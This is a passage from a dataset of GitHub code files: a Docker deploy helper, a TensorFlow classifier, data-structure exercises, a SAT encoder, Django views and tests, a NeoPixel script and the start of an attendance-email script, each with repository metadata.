UL): 3, (D, UR): 3, (DB, F): 3, (DB, FL): 3, (DB, FR): 3, (DB, U): 3,\r\n (DB, UFL): 3, (DB, UFR): 3, (DB, UL): 3, (DB, UR): 3, (DBL, F): 3,\r\n (DBL, FR): 3, (DBL, R): 3, (DBL, U): 3, (DBL, UF): 3, (DBL, UR): 3,\r\n (DBR, F): 3, (DBR, FL): 3, (DBR, L): 3, (DBR, U): 3, (DBR, UF): 3,\r\n (DBR, UL): 3, (DF, U): 3, (DF, UBL): 3, (DF, UBR): 3, (DF, UL): 3,\r\n (DF, UR): 3, (DFL, R): 3, (DFL, U): 3, (DFL, UB): 3, (DFL, UR): 3,\r\n (DFR, L): 3, (DFR, U): 3, (DFR, UB): 3, (DFR, UL): 3, (DL, FR): 3,\r\n (DL, R): 3, (DL, U): 3, (DL, UB): 3, (DL, UBR): 3, (DL, UF): 3,\r\n (DL, UFR): 3, (DR, FL): 3, (DR, L): 3, (DR, U): 3, (DR, UB): 3,\r\n (DR, UBL): 3, (DR, UF): 3, (DR, UFL): 3, (F, UB): 3, (F, UBL): 3,\r\n (F, UBR): 3, (FL, R): 3, (FL, UB): 3, (FL, UBR): 3, (FL, UR): 3,\r\n (FR, L): 3, (FR, UB): 3, (FR, UBL): 3, (FR, UL): 3, (L, UBR): 3,\r\n (L, UFR): 3, (L, UR): 3, (R, UBL): 3, (R, UFL): 3, (R, UL): 3,\r\n\r\n # DIST 4 PAIRS\r\n (B, F): 4, (BL, FR): 4, (BR, FL): 4, (D, U): 4, (DB, UF): 4,\r\n (DBL, UFR): 4, (DBR, UFL): 4, (DF, UB): 4, (DFL, UBR): 4,\r\n (DFR, UBL): 4, (DL, UR): 4, (DR, UL): 4, (L, R): 4,\r\n\r\n # UNDEFINED DIST PAIRS\r\n (B, UNKNOWN): None, (BL, UNKNOWN): None, (BR, UNKNOWN): None,\r\n (D, UNKNOWN): None, (DB, UNKNOWN): None, (DBL, UNKNOWN): None,\r\n (DBR, UNKNOWN): None, (DF, UNKNOWN): None, (DFL, UNKNOWN): None,\r\n (DFR, UNKNOWN): None, (DL, UNKNOWN): None, (DR, UNKNOWN): None,\r\n (F, UNKNOWN): None, (FL, UNKNOWN): None, (FR, UNKNOWN): None,\r\n (L, UNKNOWN): None, (R, UNKNOWN): None, (U, UNKNOWN): None,\r\n (UB, UNKNOWN): None, (UBL, UNKNOWN): None, (UBR, UNKNOWN): None,\r\n (UF, UNKNOWN): None, (UFL, UNKNOWN): None, (UFR, UNKNOWN): None,\r\n (UL, UNKNOWN): None, (UNKNOWN, B): None, (UNKNOWN, BL): None,\r\n (UNKNOWN, BR): None, (UNKNOWN, D): None, (UNKNOWN, DB): None,\r\n (UNKNOWN, DBL): None, (UNKNOWN, DBR): None, (UNKNOWN, DF): None,\r\n (UNKNOWN, DFL): None, (UNKNOWN, DFR): None, (UNKNOWN, DL): None,\r\n (UNKNOWN, DR): None, (UNKNOWN, F): None, (UNKNOWN, FL): None,\r\n (UNKNOWN, FR): None, (UNKNOWN, L): None, (UNKNOWN, R): None,\r\n (UNKNOWN, U): None, (UNKNOWN, UB): None, (UNKNOWN, UBL): None,\r\n (UNKNOWN, UBR): None, (UNKNOWN, UF): None, (UNKNOWN, UFL): None,\r\n (UNKNOWN, UFR): None, (UNKNOWN, UL): None, (UNKNOWN, UR): None,\r\n (UR, UNKNOWN): None, (UNKNOWN, UNKNOWN): None,\r\n }\r\n # make distance symmetric\r\n for (f1, f2), d in list(DIST.items()):\r\n DIST[(f2, f1)] = d\r\n\r\n\r\nPOSTV = EVIDENCE_DECISION.CODE.POSITIVE\r\nNEGTV = EVIDENCE_DECISION.CODE.NEGATIVE\r\nINCMP = EVIDENCE_DECISION.CODE.INCOMPARABLE\r\nUNREV = EVIDENCE_DECISION.CODE.UNREVIEWED\r\nUNKWN = EVIDENCE_DECISION.CODE.UNKNOWN\r\n\r\nSAME = META_DECISION.CODE.SAME\r\nDIFF = META_DECISION.CODE.DIFF\r\nNULL = META_DECISION.CODE.NULL\r\n\r\nUNINFERABLE = (INCMP, UNREV, UNKWN)\r\n\r\n\r\nif __name__ == '__main__':\r\n \"\"\"\r\n CommandLine:\r\n python ~/code/graphid/graphid.core/state.py all\r\n \"\"\"\r\n import xdoctest\r\n xdoctest.doctest_module(__file__)\r\n","repo_name":"Erotemic/graphid","sub_path":"graphid/core/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":15342,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"42589757077","text":"import subprocess\nfrom environment_variables import load_env as le\n\ndef docker_test(container_name, port='8080'):\n '''\n docker function to build a container and test it locally\n '''\n # building the container\n subprocess.run(f\"docker build -t {container_name} .\", shell=True)\n\n # running the container on the 8080 port (by default, can be overwritte)\n subprocess.run(f\"docker run -e PORT=8000 -p {port}:8000 container\", shell=True) #\n\ndef docker_deploy():\n # Getting env variables defined in the env folder\n gcp_project_id, docker_image_name, gcr_multi_region, gcr_region = le.get_env_variables()\n\n build = f\"docker build -t {gcr_multi_region}/{gcp_project_id}/{docker_image_name} .\"\n subprocess.run(build, shell=True)\n\n # Running the docker push command with the env variables\n push = f\"docker push {gcr_multi_region}/{gcp_project_id}/{docker_image_name}\"\n subprocess.run(push, shell=True)\n\n deploy = f\"gcloud run deploy --image {gcr_multi_region}/{gcp_project_id}/{docker_image_name} --region {gcr_region}\"\n subprocess.run(deploy, shell=True)\n\nif __name__ == \"__main__\":\n # Asking the user what he wants: testing locally or deploying to Google Container?\n type = input(\"Do you want to test or deploy? \")\n\n if type.lower() == 'test':\n # Testing: executing the docker_test function above\n docker_test(\"container\")\n # Go to localhost://8080 to check if the api.py file works\n\n elif type.lower() == 'deploy':\n # Deploying: pushing local modifications to Google Container (cloud where container is hosted)\n docker_deploy()\n\n else:\n print(\"I didn't understand, please input test or deploy\")\nelse:\n docker_deploy()\n","repo_name":"amaury1104/crypto_2023_03","sub_path":"Back/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22336077365","text":"import csv\nimport numpy as np\nfrom tensorflow.contrib.learn import DNNClassifier, infer_real_valued_columns_from_input\n\n\ndef formalize(y, num_labels):\n m = len(y)\n yvec = np.zeros((m, num_labels))\n for i in range(m):\n yvec[i, int(y.item(i))-1] = 1\n\n return yvec.astype(np.int32)\n\n\ndef to_int(arr):\n mat = np.mat(arr)\n m, n = mat.shape\n ret = np.zeros((m, n))\n for i in range(m):\n for j in range(n):\n ret[i, j] = mat[i, j]\n return ret.astype(np.int32)\n\n\ndef load_train_data():\n l = []\n with open(\"train.csv\") as f:\n lines = csv.reader(f)\n for line in lines:\n l.append(line)\n l.remove(l[0])\n l = np.array(l)\n labels = l[:, :1]\n data = l[:, 1:]\n return to_int(data), formalize(to_int(labels), 10)\n\n\ndef load_test_data():\n l = []\n with open(\"test.csv\") as f:\n lines = csv.reader(f)\n for line in lines:\n l.append(line)\n l.remove(l[0])\n return to_int(l)\n\n\ntrain_images, train_labels = load_train_data()\ntest_images = load_test_data()\nprint(train_images[0])\n\nfeature_columns = infer_real_valued_columns_from_input(train_images)\nclf = DNNClassifier([100], feature_columns, n_classes=10)\nprint(train_images.shape)\nprint(train_labels.shape)\nclf.fit(train_images, train_labels)\nprint(\"done training\")\n\npred = clf.predict(test_images[0])\nprint(pred)\n","repo_name":"kevwan/mlpy","sub_path":"python/kaggle/digitrecognizer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23179144793","text":"class Binary_Tree_Node:\n def __init__(self, data=None, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\n def add_node(self, data):\n if data == self.data:\n return\n if data < self.data:\n if self.left:\n self.left.add_node(data)\n else:\n self.left = Binary_Tree_Node(data)\n else:\n if self.right:\n self.right.add_node(data)\n else:\n self.right = Binary_Tree_Node(data)\n\n def find_node(self,data):\n if self.data is None:\n return False\n if data == self.data:\n return True\n if data < self.data:\n if self.left:\n return self.left.find_node(data)\n else:\n return False\n if data > self.data:\n if self.right:\n return self.right.find_node(data)\n else:\n return False\n\n\n\n\n\n\nbst = Binary_Tree_Node(6)\nbst.add_node(6)\nbst.add_node(5)\nbst.add_node(7)\n\n# print(bst.data, bst.left.data, bst.right.data)\nprint(bst.find_node(5))\n","repo_name":"AdilovM/lc","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34863832388","text":"tog = [[0,1],[0,1],[0,1],[0,0]]\n\ndef matrixScore(tog):\n # 先转化行\n row = len(tog)\n column = len(tog[0])\n for r in range(row):\n\n if tog[r][0]==0:\n for c in range(column):\n if tog[r][c] ==0:\n tog[r][c]=1\n else:\n tog[r][c]=0\n print(row,column)\n #再��化列\n for c in range(1,column):\n num_1 = 0\n for r in range(row):\n if tog[r][c]==1:\n num_1 +=1\n print(num_1,row/2)\n if num_1 List[List[int]]:\n n = len(x) - 1\n clauses = []\n\n # TODO: Return 2nk+n-3k-1 clauses that are satisfiable iff at most k\n # of the n variables x[i] are True\n\n s = [[] for i in range(n+1)]\n\n #add !x1|s1,1\n global NVAR\n\n for i in range(1, n):\n s[i].append(0)\n for j in range(1, k+1):\n s[i].append(NVAR)\n NVAR = NVAR + 1\n\n a = 1\n\n firstCla = [-x[1], s[1][1]]\n clauses.append(firstCla)\n\n\n #add !s1,j where 1 < j <= k\n for j in range(2, k+1):\n clauses.append([-s[1][j]])\n\n #add third part\n for i in range(2, n):\n clauses.append([-x[i], s[i][1]])\n clauses.append([-s[i-1][1], s[i][1]])\n for j in range(2,k + 1):\n clauses.append([-x[i], -s[i-1][j-1], s[i][j]])\n clauses.append([-s[i-1][j], s[i][j]])\n clauses.append([-x[i], -s[i-1][k]])\n\n #add last part\n clauses.append([-x[n], -s[n-1][k]])\n\n #print(clauses)\n assert len(clauses) == 2 * n * k + n - 3 * k - 1\n return clauses\n\n# <=k(x1,...,xn) <--> >=(n-k)(!x1,...,xn)\ndef at_least(k: int, x: List[int]) -> List[List[int]]:\n n = len(x) - 1\n clauses = []\n for i in range(len(x)):\n x[i] = -x[i]\n clauses = at_most(n-k, x)\n\n return clauses\n\n\n\n\ndef and_imply(x: List[int], b: int) -> List[List[int]]:\n # TODO: Return a set of clauses that encodes (x[0] /\\ ... /\\ x[n-1]) -> b\n clause = []\n # if b == 1:\n #clause.\n\n\n return None\n\n\ndef or_imply(x: List[int], b: int) -> List[List[int]]:\n # TODO: Return a set of clauses that encodes (x[0] \\/ ... \\/ x[n-1]) -> b\n clause = []\n clauses = []\n if b == 1:\n for i in range(len(x)):\n clause.append(x[i])\n clauses.append(clause)\n elif b == 0:\n for j in x:\n clauses.append(-x[j])\n # print(clauses)\n return clauses\n\n\ndef gen_cnf(d: int, c: int, e: int) -> Tuple[int, List[List[int]]]:\n nvar = 0 # the number of boolean variables (required by DIMACS CNF)\n cnf = [] # a list of clauses\n\n # TODO: Generate and add clauses to cnf, by calls to at_most, and_imply,\n # and or_imply. Also set nvar accordingly.\n t = int(d / c)\n global NVAR\n\n #variable list: list[i][j][k] means wether the ith diner eat at kth table in jth evening\n varList = [[[] for j in range(e)] for i in range(d)]\n for i in range(d):\n for j in range(e):\n for k in range(t):\n varList[i][j].append(NVAR)\n NVAR = NVAR + 1\n\n\n\n #Constraint 1: every diner can only eat in one table in each evening\n for i in range(d):\n for j in range(e):\n oneTable = []\n oneTable.append(0)\n for k in range(t):\n #find all varibales that tell whether a fixed diner eats at kth table in a fixed evening,\n oneTable.append(varList[i][j][k])\n #he must eat at most one table\n clauses = at_most(1, oneTable)\n for c1 in range(len(clauses)):\n cnf.append(clauses[c1])\n oneTable.remove(0)\n\n #he must eat at least one table (x1\\/x2...\\/xn)\n clauses = or_imply(oneTable, 1)\n for c2 in range(len(clauses)):\n cnf.append(clauses[c2])\n\n #Constraint 2: there are exactly c diners eat at each table in each evening\n for j in range(e):\n for k in range(t):\n cDiners = []\n cDiners.append(0)\n for i in range(d):\n #find all variables that tell whether ith diner eats at a fixed table in a fixed evening\n cDiners.append(varList[i][j][k])\n #the table must serve exactly c people = at_most c /\\ at_least_c\n clauses1 = at_most(c, cDiners)\n for c3 in range(len(clauses1)):\n cnf.append(clauses1[c3])\n clauses2 = at_least(c, cDiners)\n for c4 in range(len(clauses2)):\n cnf.append(clauses2[c4])\n\n #Constraint 3: diner can only eat with people who have not dined yet\n constraint2 = constrint2(varList, d, e, t)\n for i in range(len(constraint2)):\n cnf.append(constraint2[i])\n nvar = NVAR\n return nvar, cnf\n\n\ndef constrint2(varList , d: int, e: int, t: int):\n\n clauses = []\n #x1 /\\ x2 ==> !(x3/\\x4) = !x1\\/!x2\\/!x3!\\/x4\n for i in range(d):\n for j in range(i+1, d):\n for x1 in range(e):\n for y1 in range(t):\n twoDiner = []\n twoDiner.append(-varList[i][x1][y1])\n twoDiner.append(-varList[j][x1][y1])\n for x2 in range(e):\n if x1 != x2:\n for y2 in range(t):\n noTogether = []\n noTogether.append(twoDiner[0])\n noTogether.append(twoDiner[1])\n noTogether.append(-varList[i][x2][y2])\n noTogether.append(-varList[j][x2][y2])\n clause = or_imply(noTogether, 1)\n clauses.append(clause[0])\n\n return clauses\n\n\n\nif __name__ == \"__main__\":\n\n\n try:\n d = int(sys.argv[1])\n c = int(sys.argv[2])\n e = int(sys.argv[3])\n except IndexError:\n print('Usage: cruDes d c e')\n\n\n nvar, cnf = gen_cnf(d, c, e)\n\n # Output to stdout in DIMACS CNF format\n with open('in.dimacs', 'w') as f:\n f.write(f'p cnf {nvar} {len(cnf)}')\n f.write('\\n')\n for clause in cnf:\n f.write(f'{\" \".join([str(var) for var in clause])} 0')\n f.write('\\n')\n print(\"CNF generate successfully\")","repo_name":"Marksmug/Vigenere-Group","sub_path":"cruDes.py","file_name":"cruDes.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7260480587","text":"\"\"\"Unit Tests for the socialprofile module forms\"\"\"\nimport logging\n\nfrom django.test import TestCase\nfrom social_core.backends.google import GoogleOAuth2\nfrom social_core.backends.twitter import TwitterOAuth\n\nfrom socialprofile.models import SocialProfile\nfrom socialprofile.pipeline import socialprofile_extra_values\n\nLOGGER = logging.getLogger(name=\"socialprofile.test_pipeline\")\n\n\nclass SocialProfilePipelineTestCase(TestCase):\n \"\"\"Test Case for Social Profile Pipeline\"\"\"\n\n def setUp(self):\n \"\"\"Set up common assets for tests\"\"\"\n LOGGER.debug(\"SocialProfile Pipeline Tests setUp\")\n self.user1 = SocialProfile.objects.create_user(\n \"user1\", \"user1@user1.com\", \"user1password\"\n )\n self.user1.gender = \"other\"\n self.user1.url = \"http://test.com\"\n self.user1.description = \"Test User 1\"\n self.user1.image_url = (\n \"http://www.gravatar.com/avatar/00000000000000000000000000000000?d=mm\"\n )\n self.user1.save()\n\n # self.sa1 = UserSocialAuth.objects.create(user=self.user1, provider='google-oauth2', uid='user1@user1.com')\n def test_socialprofile_pipeline_google(self):\n \"\"\"Test editing executing pipeline methods in isolation for google\"\"\"\n LOGGER.debug(\"Test socialprofile pipeline Google\")\n backend = GoogleOAuth2()\n response = {\n \"name\": {\"familyName\": \"User 1\", \"givenName\": \"Test\"},\n \"gender\": \"other\",\n \"image\": {\"url\": \"http://image.url\"},\n \"occupation\": \"User Description\",\n \"url\": \"http://test.com\",\n }\n\n socialprofile_extra_values(backend, {}, response, \"1\", self.user1)\n self.assertEqual(self.user1.description, \"User Description\")\n self.assertEqual(self.user1.gender, \"other\")\n self.assertEqual(self.user1.image_url, \"http://image.url\")\n self.assertEqual(self.user1.url, \"http://test.com\")\n\n # def test_socialprofile_pipeline_facebook(self):\n # \"\"\"Test editing executing pipeline methods in isolation for facebook\"\"\"\n # LOGGER.debug(\"Test socialprofile pipeline Facebook\")\n # backend = Facebook2OAuth2()\n # response = {\n # 'name': {\n # 'last_name': 'User 1',\n # 'first_name': 'Test'\n # },\n # 'gender': 'other',\n # 'picture': {'data': {'url': 'http://image.url'}},\n # 'link': 'http://test.com'\n # }\n #\n # socialprofile_extra_values(backend, {}, response, '1', self.user1)\n # self.assertEquals(self.user1.gender, 'other')\n # self.assertEquals(self.user1.image_url, 'http://image.url')\n # self.assertEquals(self.user1.url, 'http://test.com')\n\n def test_socialprofile_pipeline_twitter(self):\n \"\"\"Test editing executing pipeline methods in isolation for twitter\"\"\"\n LOGGER.debug(\"Test socialprofile pipeline Twitter\")\n backend = TwitterOAuth()\n response = {\n \"name\": {\"last_name\": \"User 1\", \"first_name\": \"Test\"},\n \"gender\": \"other\",\n \"profile_image_url_https\": \"http://image.url\",\n \"description\": \"User Description\",\n \"url\": \"http://test.com\",\n }\n\n socialprofile_extra_values(backend, {}, response, \"1\", self.user1)\n self.assertEqual(self.user1.description, \"User Description\")\n self.assertEqual(self.user1.gender, \"other\")\n self.assertEqual(self.user1.image_url, \"http://image.url\")\n self.assertEqual(self.user1.url, \"http://test.com\")\n","repo_name":"DLRSP/django-sp","sub_path":"tests/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"1465526758","text":"import nextcord\nfrom nextcord.ext import commands\n\n\nclass Stop(commands.Cog):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @nextcord.slash_command(\n name=\"stop\",\n description=\"Stop the Bot, stop it before it lays eggs\",\n force_global=True\n )\n @commands.is_owner()\n async def stp(self, ctx: nextcord.Interaction):\n await ctx.send(\"ok\")\n exit()\n\n\ndef setup(bot):\n bot.add_cog(Stop(bot))\n","repo_name":"openblocki/DiscordBott","sub_path":"apps/op/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"1040119392","text":"from django.shortcuts import render,get_object_or_404, redirect\nfrom django.http import JsonResponse,HttpResponseRedirect, HttpResponse\nfrom django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.views import View\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.views.generic import ListView, FormView,CreateView,DetailView\nfrom .models import *\nfrom .forms import ReviewForm\nfrom account.models import CustomUser\nfrom django.contrib import messages\nfrom django.urls import reverse_lazy\n# Create your views here.\n\nclass ProductListView(ListView):\n context_object_name = 'products'\n paginate_by = 6\n model = Product\n template_name = 'product/home.html'\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['nbar'] = \"products\"\n return context\n\n\n# @login_required(login_url='account/login')\ndef add_to_cart(request):\n context = {}\n if request.user.is_authenticated:\n items = Cart.objects.filter(customer__id=request.user.id,status=False)\n context['items'] = items\n if request.method == \"POST\":\n pid = request.POST['pid']\n qty = request.POST['qty']\n do_exist = Cart.objects.filter(product__id=pid, customer__id=request.user.id, status=False)\n if len(do_exist) > 0:\n messages.warning(request,'Item already exists in your cart.')\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n \n else:\n product = get_object_or_404(Product, id=pid)\n usr = get_object_or_404(CustomUser,id=request.user.id)\n c = Cart(customer=usr, product=product,quantity=qty)\n c.save()\n messages.success(request, '{} Added to your cart'.format(product.name))\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n \n else:\n # anonymouse user\n pass\n return render(request, 'product/cart_detail.html', context)\n\n #using ajax to get cart details\ndef get_cart_data(request):\n items = Cart.objects.filter(customer__id=request.user.id, status=False)\n # set initial values to 0\n total,quantity,num = 0,0,0\n #loop through items in cart\n for item in items:\n total += float(item.product.price) * item.quantity# cart total\n quantity += int(item.quantity)\n num += 1# number of items in cart\n res = {\"total\":total,\"quantity\":quantity,'\"num':num}\n return JsonResponse(res)\n\ndef change_quan(request):\n if \"quantity\" in request.GET:\n cid = request.GET[\"cid\"]\n qty = request.GET[\"quantity\"]\n cart_obj = get_object_or_404(Cart,id=cid)\n cart_obj.quantity = qty\n cart_obj.save()\n return HttpResponse(cart_obj.quantity)\n\n if \"delete_cart\" in request.GET:\n id = request.GET[\"delete_cart\"]\n cart_obj = get_object_or_404(Cart,id=id)\n cart_obj.delete()\n return HttpResponse(1)\n \n\n\nclass ShowCategory(View):\n def get(self, request, category_slug):\n pcat = get_object_or_404(Category,slug=category_slug)\n categories = Category.objects.filter(parent=pcat)\n return render(request,'product/category.html',{'categories':categories,'pcat':pcat})\n\n\nclass ShowSubCategory(View):\n def get(self, request, cat_slug=None):\n if cat_slug:\n cat = get_object_or_404(Category,slug=cat_slug)\n products = Product.objects.filter(category=cat)\n \n return render(request, 'product/sub_category.html', {'products':products,'cat':cat})\n\nclass AllCategories(View):\n def get(self, request):\n categories = Category.objects.filter(parent__isnull=False)\n context = {'categories':categories}\n return render(request, 'product/allcategories.html', context)\n\n\n@login_required\ndef add_review(request, id):\n product = get_object_or_404(Product, id=id)\n form = ReviewForm(request.POST)\n context = {'form':form}\n if 'review' in request.POST:\n proid = request.POST.get('proid')\n if form.is_valid():\n data = Review()\n data.name = form.cleaned_data.get('name')\n data.message = form.cleaned_data.get('message')\n data.rating = form.cleaned_data.get('rating')\n data.ip = request.META.get('REMOTE_ADDR')\n data.product = proid\n data.user = request.user\n data.save()\n messages.success(request, 'review added successfully.')\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n return render(request, 'product/product_detail.html', context)\n\n# class AddReview(CreateView):\n# model = Review\n# template_name = 'product/product_review.html'\n# form_class = ReviewForm\n# success_url = reverse_lazy('product:products')\n \n# def form_valid(self, form):\n# form.instance.product_id = self.kwargs['id']\n# form.instance.ip = self.request.META.get('REMOTE_ADDR')\n# form.instance.name = self.request.user\n# # form.instance.next = self.request.POST.get('next')\n# return super().form_valid(form)\n\n \n\n\n\nclass ReviewDisplay(DetailView):\n model = Product\n template_name = 'product/product_detail.html'\n context_object_name = 'product'\n\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n self.object = self.get_object()\n product = self.object\n ppictures = Picture.objects.filter(product=product)\n specifications = product.specification.split(\",\")\n context['ppictures'] = ppictures\n context['specifications'] = specifications\n context['form'] = ReviewForm()\n return context\n\nclass Reviewproduct(SingleObjectMixin, FormView):\n model = Product\n form_class = ReviewForm\n template_name = 'product/product_review.html' \n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().post(request, *args, **kwargs)\n\n def get_form_kwargs(self):\n kwargs = super(Reviewproduct, self).get_form_kwargs()\n kwargs['request'] = self.request\n return kwargs\n\n def form_valid(self, form):\n review = form.save(commit=False)\n review.product = self.object\n review.ip = self.request.META.get('REMOTE_ADDR')\n review.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n product = self.object\n return reverse('product:product-detail', kwargs={'id':product.id,'slug':product.slug})+'#reviews'\n\n\nclass ProductDetail(View):\n def get(self, request, *args, **kwargs):\n view = ReviewDisplay.as_view()\n return view(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n view = Reviewproduct.as_view()\n return view(request, *args, **kwargs)\n # def get(self, request, id, slug):\n # product = get_object_or_404(Product, id=id, slug=slug)\n # # review = get_object_or_404(Review, product=product.id)\n # ppictures = Picture.objects.filter(product=product)\n # specifications = product.specification.split(\",\")\n # context = {'product':product,'ppictures':ppictures,'specifications':specifications}\n # return render(request, 'product/product_detail.html', context)\n\n","repo_name":"Dee68/gingerscotch","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19332692363","text":"#!/usr/bin/env python\n\n# Daniel Grubbs\n# Date: 1/31/2018\n\n\ndef f_tuple(t):\n \"\"\"Setup the format for printing the tuple.\"\"\"\n print(\"file_{:03}: {:.2f} {:.2e} {:.3e}\".format(t[0], t[1], t[2], t[3]))\n\n\nf_tuple((2, 123.4567, 10000, 12345.67))\n\n\nt = (1, 2, 3, 4, 5)\nprint('The three numbers: {} {} {}'.format(*t))\n\n\ndef formatter(nums):\n \"\"\"Dynamioc strings with variable lengths.\"\"\"\n form_string = ''\n for num in nums:\n form_string = form_string + '{:d} '\n temp = form_string.split()\n space = ', '\n form_string = space.join(temp)\n form_string = 'The ' + str(len(nums)) + ' numbers are: ' + form_string\n return form_string.format(*nums)\n\n\nprint(formatter((4, 6, 8, 10, 12)))\n\n\n# Task 4\ntask4_tup = (4, 30, 2017, 2, 27)\nprint('{} {} {} {} {}'.format(*task4_tup))\nprint('{3:02d} {1} {2} {0:02d} {4}'.format(4, 30, 2017, 2, 27))\n\n# Task 5\ntask5_list =['orange', 1.3, 'lemon', 1.1]\nprint('The weight of an {} is {} and the weight of a {} is {}'.format(*task5_list))\n\n\n# Task 6\nprint('{:20}{:10}{:20}{:8}'.format('First', '$99.01', 'Second', '$88.09'))","repo_name":"UWPCE-PythonCert-ClassRepos/Wi2018-Online","sub_path":"students/daniel_grubbs/lesson03/strformat_lab.py","file_name":"strformat_lab.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37916834249","text":"\r\n\r\nl, kmax = list(map(int, input().strip().split()))\r\nn= input().strip()\r\n\r\ndef FoldItUp(l, n):\r\n # Fold the input string over itself; return the middle char\r\n # as well if dealing with an odd number of characters\r\n if l % 2 == 0:\r\n folded, middle = list(zip(n[:(l//2)+1], list(reversed(n[(l//2):])))), ''\r\n else:\r\n folded, middle = list(zip(n[:(l//2)], list(reversed(n[(l//2)+1:])))), str(n[l//2])\r\n\r\n # Now, iterate over each tuple in folded. If equal, condense to single-val;\r\n # else, leave as-is and maintain a count.\r\n # Example: n1 = '123329' becomes: [['1','9'], ['2'], ['3']]\r\n ct = 0\r\n new_list = []\r\n for x, y in folded:\r\n if x == y:\r\n new_list.append([x])\r\n else:\r\n ct += 1\r\n new_list.append([x,y])\r\n return new_list, middle, ct\r\n \r\nfolded, middle_char, kmin = FoldItUp(l, n)\r\nnew_string, changes_made = '', 0\r\n\r\n# Kmin is the minimum number of necessary changes \r\n# in order to make a palindrome\r\nif kmax >= kmin:\r\n for idx in folded:\r\n if kmax - kmin > changes_made:\r\n # just make it 9\r\n if len(idx) < 2:\r\n if idx != ['9'] and (kmax-(kmin + changes_made) >=2):\r\n new_string += '9'\r\n changes_made += 2\r\n else:\r\n new_string += idx[0]\r\n else:\r\n kmin -= 1\r\n if max(idx) == '9':\r\n new_string += '9'\r\n changes_made +=1\r\n elif kmax-(kmin + changes_made) >=2:\r\n new_string += '9'\r\n changes_made +=2\r\n else:\r\n new_string += max(idx)\r\n else:\r\n # make it the greater of the two val options\r\n new_string += max(idx)\r\n if len(idx) == 2:\r\n changes_made += 1\r\n kmin -= 1\r\n if middle_char and changes_made < kmax:\r\n middle_char = '9'\r\n changes_made += 1\r\nelse:\r\n # Not enough allowed changes (k) to make a palindrome -- why bother? -- let's go eat.\r\n new_string = None\r\n\r\nresult = str(new_string + middle_char + ''.join(list(reversed(new_string)))) if new_string is not None else '-1'\r\nprint(result)\r\n\r\n\r\n","repo_name":"t753/Hackerrank-solutions","sub_path":"richierich_hr.py","file_name":"richierich_hr.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35863471353","text":"import time\nimport board\nimport busio\nfrom rainbowio import colorwheel\nfrom adafruit_seesaw import seesaw, neopixel\n\ni2c = busio.I2C(board.SCL, board.SDA)\nss = seesaw.Seesaw(i2c, addr=0x60)\nneo_pin = 15\nnum_pixels = 64\n\npixels = neopixel.NeoPixel(ss, neo_pin, num_pixels, brightness = 0.1)\n\ncolor_offset = 0\n\nwhile True:\n for i in range(num_pixels):\n rc_index = (i * 256 // num_pixels) + color_offset\n pixels[i] = colorwheel(rc_index & 255)\n pixels.show()\n color_offset += 1\n time.sleep(0.01)\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"NeoDriver_seesaw_Examples/CircuitPython_NeoDriver_seesaw/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"39935972648","text":"from os import path\r\nimport smtplib\r\nimport datetime\r\nfrom datetime import date\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom xml.etree import ElementTree\r\n#from service import *\r\nfrom msaccess import Str_C_date, res\r\nfrom jinja2 import Environment\r\nfrom bs4 import BeautifulSoup\r\nfrom holi import response\r\nimport schedule\r\n#print(\"Response :\",response)\r\n# result = next(item['value'] for item in response if item[\"key\"] == \"Host\")\r\n\r\nclass AttendanceEmail:\r\n\r\n def get_ml_vales(self,key):\r\n result = next(item['value'] for item in response if item[\"key\"] == key)\r\n return result\r\n \r\n def generate_message(self,SENDER_EMAIL,RECEIVER_EMAIL,HTML,mail_subject ,message):\r\n message['Subject'] = mail_subject\r\n message['From'] = SENDER_EMAIL\r\n message['To'] = RECEIVER_EMAIL\r\n return message\r\n def fetchData(self,Str_C_date):\r\n tree = ElementTree.parse(\"Config.xml\")\r\n print(type(tree))\r\n root = tree.getroot()\r\n details = []\r\n for holiday in root.findall(\".//Holiday\"):\r\n loop = 